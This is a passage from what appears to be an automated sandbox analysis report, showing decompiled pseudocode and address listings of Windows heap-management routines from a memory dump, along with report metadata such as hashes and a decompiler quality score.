                                  						if(_t360 <  *((intOrPtr*)(_t493 + 0x70))) {
                                  							goto L54;
                                  						}
                                  						goto L26;
                                  					}
                                  				}
                                  				_t480 = _a12;
                                  				if(_t480 <  *((intOrPtr*)(_t493 + 0x70))) {
                                  					L11:
                                  					_push(_t480);
                                  					_push(_a8);
                                  					goto L12;
                                  				}
                                  				_t410 =  *(_t493 + 0x78) + _t480;
                                  				if(_t410 <  *((intOrPtr*)(_t493 + 0x74)) || _t410 <  *(_t493 + 0xe0) >>  *((intOrPtr*)(_t493 + 0x130)) + 3) {
                                  					goto L11;
                                  				} else {
                                  					_t420 = _a8;
                                  					_a4 = E025A29B2(_t493, _t420,  &_a12, 0);
                                  					_t413 = _a12;
                                  					if(_a12 - 0x201 > 0xfbff) {
                                  						goto L13;
                                  					} else {
                                  						E025A7353(_t493, _a4, _t413);
                                  						_t492 =  *(_t493 + 0xe0) - ( *(_t493 + 0x78) << 3);
                                  						_t279 =  *(_t493 + 0x128) - ( *(_t493 + 0x128) >> 3);
                                  						if(_t492 < _t279) {
                                  							_t426 = _t493 + 0x12c;
                                  							_t279 =  *_t426 - ( *_t426 >> 3);
                                  							__eflags = _t492 - _t279;
                                  							if(_t492 > _t279) {
                                  								_t279 = E025C6372(_t493);
                                  								 *_t426 = _t492;
                                  								 *(_t493 + 0x128) = _t492;
                                  							}
                                  						}
                                  						goto L7;
                                  					}
                                  				}
                                  			}
                                  0x025d9c1a
                                  0x00000000
                                  0x025d9c20
                                  0x025d9c20
                                  0x025d9c22
                                  0x025d9c26
                                  0x025d9c29
                                  0x025d9c45
                                  0x025d9c45
                                  0x025d9c47
                                  0x025d9c7e
                                  0x025d9c7e
                                  0x025d9c82
                                  0x025d9d1b
                                  0x025d9d29
                                  0x025d9d35
                                  0x025d9d3a
                                  0x025d9d3f
                                  0x025d9d41
                                  0x025f9d2d
                                  0x025f9d34
                                  0x025f9d50
                                  0x025f9d50
                                  0x025f9d34
                                  0x025d9d47
                                  0x025d9d4c
                                  0x025d9d4e
                                  0x00000000
                                  0x025d9d54
                                  0x025f9d5d
                                  0x025f9d5e
                                  0x025f9d60
                                  0x00000000
                                  0x025f9d60
                                  0x025d9d4e
                                  0x025d9c88
                                  0x025d9c8f
                                  0x025d9c92
                                  0x025d9c96
                                  0x025d9c99
                                  0x025d9c9c
                                  0x025d9c9f
                                  0x025d9ca2
                                  0x025d9ca5
                                  0x025d9ca7
                                  0x025e892f
                                  0x025e8933
                                  0x025e8936
                                  0x025f9d16
                                  0x025f9d1c
                                  0x025d9d15
                                  0x025d9d15
                                  0x025d9d18
                                  0x00000000
                                  0x025d9d18
                                  0x00000000
                                  0x025e893c
                                  0x025d9cad
                                  0x025d9cb1
                                  0x025d9cc4
                                  0x025d9cc7
                                  0x025d9cca
                                  0x025d9cd1
                                  0x025f9c96
                                  0x025f9c9a
                                  0x025f9ca6
                                  0x025f9ca9
                                  0x025f9cad
                                  0x025f9ccf
                                  0x025f9cd4
                                  0x025f9caf
                                  0x025f9cc7
                                  0x025f9ccc
                                  0x025f9cda
                                  0x025f9cdf
                                  0x025f9ce7
                                  0x025f9ce7
                                  0x025f9c9a
                                  0x025d9cd7
                                  0x025d9cda
                                  0x025d9cde
                                  0x025d9ce1
                                  0x025d9ce3
                                  0x025f9cf1
                                  0x025d9ce9
                                  0x025d9cf0
                                  0x025d9cf1
                                  0x025d9cf4
                                  0x025d9cf6
                                  0x025f9cf8
                                  0x025f9cf8
                                  0x025f9cfa
                                  0x025f9cfc
                                  0x025f9cfd
                                  0x025f9cfe
                                  0x025f9cff
                                  0x025f9d01
                                  0x025f9d06
                                  0x025d9d07
                                  0x025d9d07
                                  0x025d9d10
                                  0x00000000
                                  0x025d9d10
                                  0x025d9cfc
                                  0x025d9d01
                                  0x00000000
                                  0x00000000
                                  0x025d9d01
                                  0x00000000
                                  0x025d9ce3
                                  0x025d9c49
                                  0x025d9c5e
                                  0x025d9c63
                                  0x025d9c65
                                  0x00000000
                                  0x00000000
                                  0x025d9c6b
                                  0x025d9c72
                                  0x025f9c73
                                  0x025f9c76
                                  0x025f9c7d
                                  0x025f9c8c
                                  0x025f9c8c
                                  0x025f9c7d
                                  0x025d9c78
                                  0x025d9c7b
                                  0x00000000
                                  0x025d9c7b
                                  0x025d9c2b
                                  0x025d9c2e
                                  0x025d9c32
                                  0x00000000
                                  0x00000000
                                  0x025d9c34
                                  0x025d9c36
                                  0x00000000
                                  0x00000000
                                  0x025d9c3c
                                  0x025d9c3f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x025d9c3f
                                  0x025d9c1a
                                  0x025bee77
                                  0x025bee7d
                                  0x025d42d6
                                  0x025d42d6
                                  0x025d42d7
                                  0x00000000
                                  0x025d42d7
                                  0x025bee86
                                  0x025bee8b
                                  0x00000000
                                  0x025beeaa
                                  0x025beeaa
                                  0x025beeba
                                  0x025beebd
                                  0x025beecc
                                  0x00000000
                                  0x025beed2
                                  0x025beed7
                                  0x025beee8
                                  0x025beef5
                                  0x025beef9
                                  0x025bef02
                                  0x025bef0f
                                  0x025bef11
                                  0x025bef13
                                  0x025bef17
                                  0x025bef1c
                                  0x025bef1e
                                  0x025bef1e
                                  0x025bef13
                                  0x00000000
                                  0x025beef9
                                  0x025beecc

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                  • Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp
                                  • Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-523794902
                                  • Opcode ID: 6ac88b0cfaf045c6a2bf43cb1c823f672bf96eaf2973f8221eea3d56563b0df6
                                  • Instruction ID: 6048d5d001120d3d54f38356bfdb6cd6b960bd20c175f8369b1d95e64d62ec01
                                  • Opcode Fuzzy Hash: 6ac88b0cfaf045c6a2bf43cb1c823f672bf96eaf2973f8221eea3d56563b0df6
                                  • Instruction Fuzzy Hash: 3F32F07160068AEFDB25CF68C484FAEBBF6FF44314F148449E9568B251C770EA81CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 62%
                                  			E025A7353(signed int _a4, signed int _a8, void* _a11, signed int _a12) {
                                  				signed int _v8;
                                  				signed short _v12;
                                  				signed short _v16;
                                  				signed int _v20;
                                  				signed short _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int __ebx;
                                  				signed int __edi;
                                  				signed int __esi;
                                  				void* __ebp;
                                  				signed short _t197;
                                  				signed int _t200;
                                  				signed int _t201;
                                  				signed int _t205;
                                  				signed short _t206;
                                  				signed short _t210;
                                  				signed short _t211;
                                  				intOrPtr _t218;
                                  				signed short _t220;
                                  				signed int _t221;
                                  				signed short _t223;
                                  				signed short* _t225;
                                  				signed short _t226;
                                  				signed short* _t229;
                                  				signed short _t230;
                                  				signed short _t237;
                                  				signed int _t239;
                                  				signed short _t240;
                                  				signed short _t248;
                                  				signed short _t249;
                                  				signed short _t257;
                                  				signed int _t266;
                                  				signed short _t268;
                                  				signed int _t269;
                                  				signed int _t270;
                                  				signed short* _t276;
                                  				signed short* _t277;
                                  				signed int _t282;
                                  				intOrPtr _t284;
                                  				signed int* _t286;
                                  				signed short _t291;
                                  				signed short _t294;
                                  				signed short _t297;
                                  				signed short _t298;
                                  				signed int _t299;
                                  				signed short _t304;
                                  				signed int _t305;
                                  				signed short _t307;
                                  				signed short _t310;
                                  				signed short _t311;
                                  				intOrPtr _t318;
                                  				intOrPtr _t319;
                                  				signed short _t320;
                                  				signed short _t321;
                                  				signed int _t323;
                                  				void* _t327;
                                  				signed short _t329;
                                  				signed int _t330;
                                  				intOrPtr _t333;
                                  				signed int _t335;
                                  				signed int _t336;
                                  				signed short _t340;
                                  				signed short _t341;
                                  				signed short _t342;
                                  				signed short _t343;
                                  				signed int _t344;
                                  				signed int _t348;
                                  				signed int _t350;
                                  				intOrPtr _t353;
                                  				signed short* _t354;
                                  
                                  				if(_a12 == 0) {
                                  					return _t197;
                                  				} else {
                                  					_push(__ebx);
                                  					_push(__esi);
                                  					__esi = _a8;
                                  					_push(__edi);
                                  					__edi = _a4;
                                  					__ebx = ( *(__esi + 4) ^  *(__edi + 0x54)) & 0x0000ffff;
                                  					__eflags = __bx;
                                  					if(__bx == 0) {
                                  						__eflags =  *0x26777b0 - 1;
                                  						if( *0x26777b0 >= 1) {
                                  							__eflags =  *(__esi + 2) & 0x00000008;
                                  							if(( *(__esi + 2) & 0x00000008) == 0) {
                                  								__esi + 0xfff = __esi + 0x00000fff & 0xfffff000;
                                  								__eflags = (__esi + 0x00000fff & 0xfffff000) - __esi;
                                  								if((__esi + 0x00000fff & 0xfffff000) != __esi) {
                                  									__eax =  *[fs:0x18];
                                  									__eax =  *( *[fs:0x18] + 0x30);
                                  									__eflags =  *(__eax + 0xc);
                                  									if( *(__eax + 0xc) == 0) {
                                  										_push("HEAP: ");
                                  										__eax = E025E373B();
                                  									} else {
                                  										 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
                                  										 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
                                  										 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
                                  										_pop(__ecx);
                                  									}
                                  									_pop(__ecx);
                                  									_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                  									__eax = E025E373B();
                                  									_pop(__ecx);
                                  									__eax = E0263F826(__ebx, __edx, __edi, __esi, 1);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					__al =  *((intOrPtr*)(__esi + 6));
                                  					__eflags = __al;
                                  					if(__al == 0) {
                                  						_v28 = __edi;
                                  					} else {
                                  						__ecx = __al & 0x000000ff;
                                  						__eax = __esi;
                                  						__ecx = (__al & 0x000000ff) << 0x10;
                                  						__esi & 0xffff0000 = (__esi & 0xffff0000) - __ecx;
                                  						__eax = (__esi & 0xffff0000) - __ecx + 0x10000;
                                  						__eflags = __eax;
                                  						_v28 = __eax;
                                  					}
                                  					__al =  *(__esi + 2);
                                  					_a11 =  *(__esi + 2);
                                  					do {
                                  						__eflags = _a12 - 0xfe00;
                                  						if(_a12 > 0xfe00) {
                                  							__eflags = _a12 - 0xfe01;
                                  							_v8 = 0xfe00;
                                  							if(_a12 == 0xfe01) {
                                  								_v8 = 0xfdf0;
                                  							}
                                  							_t354[1] = 0;
                                  						} else {
                                  							_v8 = _a12 & 0x0000ffff;
                                  							_t354[1] = _a11;
                                  						}
                                  						_t333 = _a4;
                                  						_t354[2] =  *(_t333 + 0x54) ^ _t266;
                                  						_t205 = _v28;
                                  						_t284 =  *((intOrPtr*)(_t205 + 0x18));
                                  						__eflags = _t284 - _t205;
                                  						if(_t284 == _t205) {
                                  							_t268 = 0;
                                  						} else {
                                  							_t268 = (_t354 - _t205 >> 0x10) + 1;
                                  							__eflags = _t268;
                                  							if(__eflags <= 0) {
                                  								L113:
                                  								_push(0);
                                  								_push(0);
                                  								_push(_t205);
                                  								_push(_t354);
                                  								_push(_t284);
                                  								_push(3);
                                  								E0263F840(_t268, _t284, _t318, _t333, _t354, __eflags);
                                  								L11:
                                  								_t206 = _v8;
                                  								_t354[1] = _t354[1] & 0x000000f0;
                                  								_t354[3] = _t268;
                                  								 *_t354 = _t206;
                                  								_t354[1] = 0;
                                  								_t354[3] = 0;
                                  								__eflags =  *(_t333 + 0x40) & 0x00000040;
                                  								_t269 = _t206 & 0x0000ffff;
                                  								if(( *(_t333 + 0x40) & 0x00000040) != 0) {
                                  									E025C89F0( &(_t354[8]), _t269 * 8 - 0x10, 0xfeeefeee);
                                  									_t354[1] = _t354[1] | 0x00000004;
                                  								}
                                  								_t210 =  *(_t333 + 0xb8);
                                  								__eflags = _t210;
                                  								if(_t210 == 0) {
                                  									_t211 =  *(_t333 + 0xc4);
                                  									goto L41;
                                  								} else {
                                  									while(1) {
                                  										__eflags = _t269 -  *((intOrPtr*)(_t210 + 4));
                                  										if(_t269 <  *((intOrPtr*)(_t210 + 4))) {
                                  											break;
                                  										}
                                  										_t311 =  *_t210;
                                  										__eflags = _t311;
                                  										if(_t311 != 0) {
                                  											_t210 = _t311;
                                  											continue;
                                  										} else {
                                  											_t298 =  *((intOrPtr*)(_t210 + 4)) - 1;
                                  											__eflags = _t298;
                                  											_v24 = _t298;
                                  											L16:
                                  											_t276 = _t210 + 0x14;
                                  											while(1) {
                                  												_t320 =  *(_t210 + 0x18);
                                  												_t299 = _t298 -  *_t276;
                                  												_v12 = _t210;
                                  												_t218 =  *((intOrPtr*)(_t320 + 4));
                                  												_v20 = _t320;
                                  												__eflags = _t320 - _t218;
                                  												if(_t320 == _t218) {
                                  													goto L79;
                                  												}
                                  												L18:
                                  												_t321 =  *(_t333 + 0x4c);
                                  												_v32 = _t321;
                                  												__eflags = _t321;
                                  												if(_t321 == 0) {
                                  													_t220 =  *(_t218 - 8) & 0x0000ffff;
                                  												} else {
                                  													_t249 =  *(_t218 - 8);
                                  													_t330 =  *(_t333 + 0x4c);
                                  													_v32 = _t330;
                                  													__eflags = _t249 & _t330;
                                  													if((_t249 & _t330) != 0) {
                                  														_t249 = _t249 ^  *(_t333 + 0x50);
                                  														__eflags = _t249;
                                  													}
                                  													_t220 = _t249 & 0x0000ffff;
                                  												}
                                  												_t221 = _v8 & 0x0000ffff;
                                  												_v36 = _t221;
                                  												__eflags = _t221 - (_t220 & 0x0000ffff);
                                  												_t223 = _v20;
                                  												if(_t221 - (_t220 & 0x0000ffff) > 0) {
                                  													L73:
                                  													_v16 = _t223;
                                  													goto L40;
                                  												} else {
                                  													_t323 = _v32;
                                  													_t225 =  *_t223 - 8;
                                  													__eflags = _t323;
                                  													if(_t323 == 0) {
                                  														_t226 =  *_t225 & 0x0000ffff;
                                  													} else {
                                  														_t248 =  *_t225;
                                  														_t323 =  *(_t333 + 0x4c);
                                  														__eflags = _t248 & _t323;
                                  														if((_t248 & _t323) != 0) {
                                  															_t248 = _t248 ^  *(_t333 + 0x50);
                                  															__eflags = _t248;
                                  														}
                                  														_t226 = _t248 & 0x0000ffff;
                                  													}
                                  													__eflags = _v36 - (_t226 & 0x0000ffff);
                                  													if(_v36 - (_t226 & 0x0000ffff) <= 0) {
                                  														_t223 =  *_v20;
                                  														goto L73;
                                  													} else {
                                  														_t229 = _v12;
                                  														__eflags =  *_t229;
                                  														if( *_t229 != 0) {
                                  															L84:
                                  															_t230 = _v12;
                                  															_t348 = _t299 >> 5;
                                  															_t277 =  *((intOrPtr*)(_t230 + 0x1c)) + _t348 * 4;
                                  															_t327 = ( *((intOrPtr*)(_t230 + 4)) -  *_t276 >> 5) - 1;
                                  															_t237 =  !((1 << (_t299 & 0x0000001f)) - 1) &  *_t277;
                                  															__eflags = 1;
                                  															if(1 != 0) {
                                  																L88:
                                  																__eflags = _t237 & 0x0000ffff;
                                  																if((_t237 & 0x0000ffff) == 0) {
                                  																	_t304 = _t237 >> 0x00000010 & 0x000000ff;
                                  																	__eflags = _t304;
                                  																	if(_t304 != 0) {
                                  																		_t163 = _t304 + 0x25a37f8; // 0x10008
                                  																		_t239 = ( *_t163 & 0x000000ff) + 0x10;
                                  																	} else {
                                  																		_t162 = (_t237 >> 0x18) + 0x25a37f8; // 0x10008
                                  																		_t239 = ( *_t162 & 0x000000ff) + 0x18;
                                  																	}
                                  																} else {
                                  																	_t329 = _t237 & 0x000000ff;
                                  																	__eflags = _t329;
                                  																	if(_t329 == 0) {
                                  																		_t161 = (_t237 >> 0x00000008 & 0x000000ff) + 0x25a37f8; // 0x10008
                                  																		_t239 = ( *_t161 & 0x000000ff) + 8;
                                  																	} else {
                                  																		_t154 = _t329 + 0x25a37f8; // 0x10008
                                  																		_t239 =  *_t154 & 0x000000ff;
                                  																	}
                                  																}
                                  																_t350 = (_t348 << 5) + _t239;
                                  																_t240 = _v12;
                                  																__eflags =  *(_t240 + 8);
                                  																_t305 = _t350 + _t350;
                                  																if( *(_t240 + 8) == 0) {
                                  																	_t305 = _t350;
                                  																}
                                  																_t223 =  *( *((intOrPtr*)(_t240 + 0x20)) + _t305 * 4);
                                  																goto L73;
                                  															} else {
                                  																goto L85;
                                  															}
                                  															while(1) {
                                  																L85:
                                  																__eflags = _t348 - _t327;
                                  																if(_t348 > _t327) {
                                  																	break;
                                  																}
                                  																_t277 =  &(_t277[2]);
                                  																_t237 =  *_t277;
                                  																_t348 = _t348 + 1;
                                  																__eflags = _t237;
                                  																if(_t237 == 0) {
                                  																	continue;
                                  																}
                                  																break;
                                  															}
                                  															__eflags = _t237;
                                  															if(_t237 == 0) {
                                  																_v16 = _v16 & 0x00000000;
                                  																L40:
                                  																_t211 = _v16;
                                  																__eflags = _t211;
                                  																if(_t211 == 0) {
                                  																	_t210 =  *_v12;
                                  																	_t333 = _a4;
                                  																	_t276 = _t210 + 0x14;
                                  																	_t298 =  *_t276;
                                  																	_v24 = _t298;
                                  																	_t320 =  *(_t210 + 0x18);
                                  																	_t299 = _t298 -  *_t276;
                                  																	_v12 = _t210;
                                  																	_t218 =  *((intOrPtr*)(_t320 + 4));
                                  																	_v20 = _t320;
                                  																	__eflags = _t320 - _t218;
                                  																	if(_t320 == _t218) {
                                  																		goto L79;
                                  																	}
                                  																	goto L18;
                                  																}
                                  																L41:
                                  																_t319 = _a4;
                                  																_t77 = _t319 + 0xc4; // 0xc4
                                  																__eflags = _t77 - _t211;
                                  																if(_t77 == _t211) {
                                  																	L48:
                                  																	_t286 =  *(_t211 + 4);
                                  																	_t270 =  *_t286;
                                  																	_t331 =  &(_t354[4]);
                                  																	__eflags = _t270 - _t211;
                                  																	if(__eflags != 0) {
                                  																		_push(0);
                                  																		_push(_t270);
                                  																		_push(0);
                                  																		_push(_t211);
                                  																		_push(0);
                                  																		_push(0xc);
                                  																		E0263F840(_t270, 0, _t319, _t331, _t354, __eflags);
                                  																		_t318 = _a4;
                                  																	} else {
                                  																		 *_t331 = _t211;
                                  																		 *(_t331 + 4) = _t286;
                                  																		 *_t286 = _t331;
                                  																		 *(_t211 + 4) = _t331;
                                  																	}
                                  																	 *((intOrPtr*)(_t318 + 0x78)) =  *((intOrPtr*)(_t318 + 0x78)) + ( *_t354 & 0x0000ffff);
                                  																	_t197 =  *(_t318 + 0xb8);
                                  																	__eflags = _t197;
                                  																	if(_t197 == 0) {
                                  																		L66:
                                  																		if( *(_t318 + 0x4c) != 0) {
                                  																			_t354[1] = _t354[0] ^ _t354[1] ^  *_t354;
                                  																			 *_t354 =  *_t354 ^  *(_t318 + 0x50);
                                  																		}
                                  																		_t200 = _v8 & 0x0000ffff;
                                  																		_a12 = _a12 - _t200;
                                  																		_t266 = _v8 & 0x0000ffff;
                                  																		_t354 = _t354 + _t200 * 8;
                                  																		_t201 = _v28;
                                  																		if(_t354 >=  *((intOrPtr*)(_t201 + 0x28))) {
                                  																			L71:
                                  																			return _t201;
                                  																		} else {
                                  																			goto L69;
                                  																		}
                                  																	} else {
                                  																		_t291 =  *_t354 & 0x0000ffff;
                                  																		while(1) {
                                  																			__eflags = _t291 -  *((intOrPtr*)(_t197 + 4));
                                  																			if(_t291 <  *((intOrPtr*)(_t197 + 4))) {
                                  																				break;
                                  																			}
                                  																			_t343 =  *_t197;
                                  																			__eflags = _t343;
                                  																			if(_t343 != 0) {
                                  																				_t197 = _t343;
                                  																				continue;
                                  																			}
                                  																			_t291 =  *((intOrPtr*)(_t197 + 4)) - 1;
                                  																			__eflags = _t291;
                                  																			break;
                                  																		}
                                  																		_v32 = _t291;
                                  																		_t282 = _t291 -  *((intOrPtr*)(_t197 + 0x14));
                                  																		__eflags =  *(_t197 + 8);
                                  																		_v20 = _t282;
                                  																		_t335 = _t282 + _t282;
                                  																		if( *(_t197 + 8) == 0) {
                                  																			_t335 = _t282;
                                  																		}
                                  																		 *((intOrPtr*)(_t197 + 0xc)) =  *((intOrPtr*)(_t197 + 0xc)) + 1;
                                  																		_t336 = _t335 << 2;
                                  																		_v36 = _t336;
                                  																		_v24 =  *(_t336 +  *(_t197 + 0x20));
                                  																		__eflags = _v32 -  *((intOrPtr*)(_t197 + 4)) - 1;
                                  																		if(_v32 ==  *((intOrPtr*)(_t197 + 4)) - 1) {
                                  																			_t107 = _t197 + 0x10;
                                  																			 *_t107 =  *(_t197 + 0x10) + 1;
                                  																			__eflags =  *_t107;
                                  																		}
                                  																		_t340 = _v24;
                                  																		__eflags = _t340;
                                  																		if(_t340 == 0) {
                                  																			L64:
                                  																			_t331 =  *(_t197 + 0x20);
                                  																			 *(_v36 +  *(_t197 + 0x20)) =  &(_t354[4]);
                                  																			_t282 = _v20;
                                  																			goto L65;
                                  																		} else {
                                  																			__eflags =  *(_t318 + 0x4c);
                                  																			if( *(_t318 + 0x4c) == 0) {
                                  																				_t341 =  *(_t340 - 8) & 0x0000ffff;
                                  																			} else {
                                  																				_t342 =  *(_t340 - 8);
                                  																				__eflags =  *(_t318 + 0x4c) & _t342;
                                  																				if(( *(_t318 + 0x4c) & _t342) != 0) {
                                  																					_t342 = _t342 ^  *(_t318 + 0x50);
                                  																					__eflags = _t342;
                                  																				}
                                  																				_t341 = _t342 & 0x0000ffff;
                                  																			}
                                  																			_t331 = _t341 & 0x0000ffff;
                                  																			__eflags = ( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff);
                                  																			if(( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff) > 0) {
                                  																				L65:
                                  																				__eflags = _v24;
                                  																				if(_v24 == 0) {
                                  																					 *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) =  *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) | 1 << (_t282 & 0x0000001f);
                                  																					_t318 = _a4;
                                  																				}
                                  																				goto L66;
                                  																			} else {
                                  																				goto L64;
                                  																			}
                                  																		}
                                  																	}
                                  																}
                                  																_t344 =  *(_t319 + 0x4c);
                                  																while(1) {
                                  																	__eflags = _t344;
                                  																	if(_t344 == 0) {
                                  																		_t294 =  *(_t211 - 8) & 0x0000ffff;
                                  																	} else {
                                  																		_t297 =  *(_t211 - 8);
                                  																		_t344 =  *(_t319 + 0x4c);
                                  																		__eflags = _t297 & _t344;
                                  																		if((_t297 & _t344) != 0) {
                                  																			_t297 = _t297 ^  *(_t319 + 0x50);
                                  																			__eflags = _t297;
                                  																		}
                                  																		_t294 = _t297 & 0x0000ffff;
                                  																	}
                                  																	__eflags = (_v8 & 0x0000ffff) - (_t294 & 0x0000ffff);
                                  																	if((_v8 & 0x0000ffff) <= (_t294 & 0x0000ffff)) {
                                  																		goto L48;
                                  																	}
                                  																	_t211 =  *_t211;
                                  																	_t189 = _t319 + 0xc4; // 0xc4
                                  																	__eflags = _t189 - _t211;
                                  																	if(_t189 == _t211) {
                                  																		goto L48;
                                  																	}
                                  																}
                                  																goto L48;
                                  															}
                                  															goto L88;
                                  														}
                                  														__eflags = _v24 - _t229[2] - 1;
                                  														if(_v24 != _t229[2] - 1) {
                                  															goto L84;
                                  														}
                                  														__eflags = _t229[4];
                                  														if(_t229[4] != 0) {
                                  															_t299 = _t299 + _t299;
                                  															__eflags = _t299;
                                  														}
                                  														_t223 =  *(_t229[0x10] + _t299 * 4);
                                  														__eflags = _v20 - _t223;
                                  														if(_v20 == _t223) {
                                  															goto L40;
                                  														} else {
                                  															_t353 = _a4;
                                  															while(1) {
                                  																__eflags = _t323;
                                  																if(_t323 == 0) {
                                  																	_t307 =  *(_t223 - 8) & 0x0000ffff;
                                  																} else {
                                  																	_t310 =  *(_t223 - 8);
                                  																	_t323 =  *(_t353 + 0x4c);
                                  																	__eflags = _t310 & _t323;
                                  																	if((_t310 & _t323) != 0) {
                                  																		_t310 = _t310 ^  *(_t353 + 0x50);
                                  																		__eflags = _t310;
                                  																	}
                                  																	_t307 = _t310 & 0x0000ffff;
                                  																}
                                  																__eflags = (_v8 & 0x0000ffff) - (_t307 & 0x0000ffff);
                                  																if((_v8 & 0x0000ffff) - (_t307 & 0x0000ffff) <= 0) {
                                  																	goto L73;
                                  																}
                                  																_t223 =  *_t223;
                                  																__eflags = _v20 - _t223;
                                  																if(_v20 != _t223) {
                                  																	continue;
                                  																}
                                  																goto L40;
                                  															}
                                  															goto L73;
                                  														}
                                  													}
                                  												}
                                  												L79:
                                  												_v16 = _t320;
                                  												goto L40;
                                  											}
                                  										}
                                  									}
                                  									_t298 = _t269;
                                  									_v24 = _t269;
                                  									goto L16;
                                  								}
                                  							}
                                  							__eflags = _t268 - 0xfe;
                                  							if(__eflags >= 0) {
                                  								goto L113;
                                  							}
                                  						}
                                  						goto L11;
                                  						L69:
                                  					} while (_a12 != 0);
                                  					_t201 =  *(_a4 + 0x54) ^ _v8;
                                  					_t354[2] = _t201;
                                  					if(_v8 == 0) {
                                  						__eflags =  *0x26777b0 - 1;
                                  						if( *0x26777b0 >= 1) {
                                  							_t201 =  &(_t354[0x7ff]) & 0xfffff000;
                                  							__eflags = _t201 - _t354;
                                  							if(_t201 != _t354) {
                                  								_t257 =  *( *[fs:0x18] + 0x30);
                                  								__eflags =  *(_t257 + 0xc);
                                  								if( *(_t257 + 0xc) == 0) {
                                  									_push("HEAP: ");
                                  									E025E373B();
                                  								} else {
                                  									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
                                  								}
                                  								_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                  								E025E373B();
                                  								_t201 = E0263F826(_t266, _t318, _t331, _t354, 1);
                                  							}
                                  						}
                                  					}
                                  					goto L71;
                                  				}
                                  			}











































































                                  0x025a75f4
                                  0x025a75f7
                                  0x025a75f9
                                  0x025a75f9
                                  0x025a75f9
                                  0x025a75fc
                                  0x025a75fc
                                  0x025a7602
                                  0x025a7607
                                  0x025a7609
                                  0x025a761a
                                  0x025a761a
                                  0x025a761e
                                  0x025a4479
                                  0x025a447b
                                  0x025a447b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x025a7609
                                  0x025a75e5
                                  0x025a7590
                                  0x025a753e
                                  0x025a7541
                                  0x025a7541
                                  0x025a7543
                                  0x025d9f04
                                  0x025a7549
                                  0x025a7549
                                  0x025a754c
                                  0x025a754f
                                  0x025a7551
                                  0x025a7553
                                  0x025a7553
                                  0x025a7553
                                  0x025a7556
                                  0x025a7556
                                  0x025a7560
                                  0x025a7562
                                  0x00000000
                                  0x00000000
                                  0x025edb1a
                                  0x025edb1c
                                  0x025edb22
                                  0x025edb24
                                  0x00000000
                                  0x00000000
                                  0x025edb2a
                                  0x00000000
                                  0x025a7541
                                  0x00000000
                                  0x025d9d8f
                                  0x025a74d7
                                  0x025a74da
                                  0x00000000
                                  0x00000000
                                  0x025a74e0
                                  0x025a74e4
                                  0x025a74e6
                                  0x025a74e6
                                  0x025a74e6
                                  0x025a74eb
                                  0x025a74ee
                                  0x025a74f1
                                  0x00000000
                                  0x025a74f3
                                  0x025a74f3
                                  0x025a74f6
                                  0x025a74f6
                                  0x025a74f8
                                  0x025d9efb
                                  0x025a74fe
                                  0x025a74fe
                                  0x025a7501
                                  0x025a7504
                                  0x025a7506
                                  0x025a7508
                                  0x025a7508
                                  0x025a7508
                                  0x025a750b
                                  0x025a750b
                                  0x025a7517
                                  0x025a7519
                                  0x00000000
                                  0x00000000
                                  0x025a751f
                                  0x025a7521
                                  0x025a7524
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x025a7524
                                  0x00000000
                                  0x025a74f6
                                  0x025a74f1
                                  0x025a74c1
                                  0x025b147c
                                  0x025b147c
                                  0x00000000
                                  0x025b147c
                                  0x025a744a
                                  0x025a743a
                                  0x025aab33
                                  0x025aab35
                                  0x00000000
                                  0x025aab35
                                  0x025a7427
                                  0x025a73f1
                                  0x025a73f7
                                  0x00000000
                                  0x00000000
                                  0x025a73f7
                                  0x00000000
                                  0x025a7650
                                  0x025a7650
                                  0x025a7661
                                  0x025a766a
                                  0x025a766e
                                  0x025edb4c
                                  0x025edb53
                                  0x025edb5f
                                  0x025edb64
                                  0x025edb66
                                  0x025edb72
                                  0x025edb75
                                  0x025edb79
                                  0x025edb9b
                                  0x025edba0
                                  0x025edb7b
                                  0x025edb93
                                  0x025edb98
                                  0x025edba6
                                  0x025edbab
                                  0x025edbb3
                                  0x025edbb3
                                  0x025edb66
                                  0x025edb53
                                  0x00000000
                                  0x025a766e

                                  Strings
